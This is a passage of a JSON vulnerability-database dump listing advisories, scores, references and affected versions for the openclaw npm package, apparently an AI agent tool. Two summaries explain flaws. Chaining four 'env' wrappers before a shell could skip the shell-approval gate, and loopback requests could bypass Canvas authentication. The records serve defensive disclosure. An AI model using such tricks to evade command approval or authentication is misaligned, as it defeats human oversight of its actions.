vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-32846","GHSA-hggm-x7r9-mm7v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8uzb-xmf8-hbca"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50760?format=json","vulnerability_id":"VCID-8v2w-jgh7-6ybq","summary":"OpenClaw: system.run wrapper-depth boundary could skip shell approval gating\nOpenClaw's `system.run` dispatch-wrapper handling applied different depth-boundary rules to shell-wrapper approval detection and execution planning.\n\nWith exactly four transparent dispatch wrappers such as repeated `env` invocations before `/bin/sh -c`, the approval classifier could stop treating the command as a shell wrapper at the depth boundary while execution planning still unwrapped through to the shell payload. In `security=allowlist` mode, that mismatch could skip the expected approval-required path for the shell wrapper invocation.\n\nLatest published npm version: `2026.3.2`\n\nFixed on `main` on March 7, 2026 in `2fc95a7cfc1eb9306356510b0251b6d51fb1c0b0` by keeping shell-wrapper classification active at the configured dispatch depth boundary and only failing closed beyond that boundary. This aligns approval gating with the execution plan. 
Legitimate shallow dispatch-wrapper usage continues to work.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27183","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03735","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03746","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03743","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27183"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2fc95a7cfc1eb9306356510b0251b6d51fb1c0b0","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T14:00:14Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2fc95a7cfc1eb9306356510b0251b6d51fb1c0b0"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system"
:"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://vulncheck.com/advisories/openclaw-mar-shell-approval-gating-bypass-via-dispatch-wrapper-depth-mismatch","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T14:00:14Z/"}],"url":"https://vulncheck.com/advisories/openclaw-mar-shell-approval-gating-bypass-via-dispatch-wrapper-depth-mismatch"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27183","reference_id":"CVE-2026-27183","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27183"},{"reference_url":"https://github.com/advisories/GHSA-r6qf-8968-wj9q","reference_id":"GHSA-r6qf-8968-wj9q","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r6qf-8968-wj9q"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6qf-8968-wj9q","reference_id":"GHSA-r6qf-8968-wj9q","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-24T14:00:14Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r6qf-8968-wj9q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID
-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID
-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID
-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID
-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID
-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID
-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["CVE-2026-27183","GHSA-r6qf-8968-wj9q"],"risk_score":2.4,"exploitability":"0.5","weighted_severity":"4.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8v2w-jgh7-6ybq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89569?format=json","vulnerability_id":"VCID-8z7r-a8dv-eueb","summary":"Duplicate Advisory: OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n### Duplicate Advisory\nThis advisory has 
been withdrawn because it is a duplicate of GHSA-6mqc-jqh6-x8fc. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.23 contains an authentication bypass vulnerability in the Canvas gateway where authorizeCanvasRequest() unconditionally allows local-direct requests without validating bearer tokens or canvas capabilities. Attackers can send unauthenticated loopback HTTP and WebSocket requests to Canvas routes to bypass authentication and gain unauthorized access.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc","reference_id":"","
reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"},{"reference_url":"https://github.com/advisories/GHSA-9gvx-vj57-vqqx","reference_id":"GHSA-9gvx-vj57-vqqx","reference_type":"","score
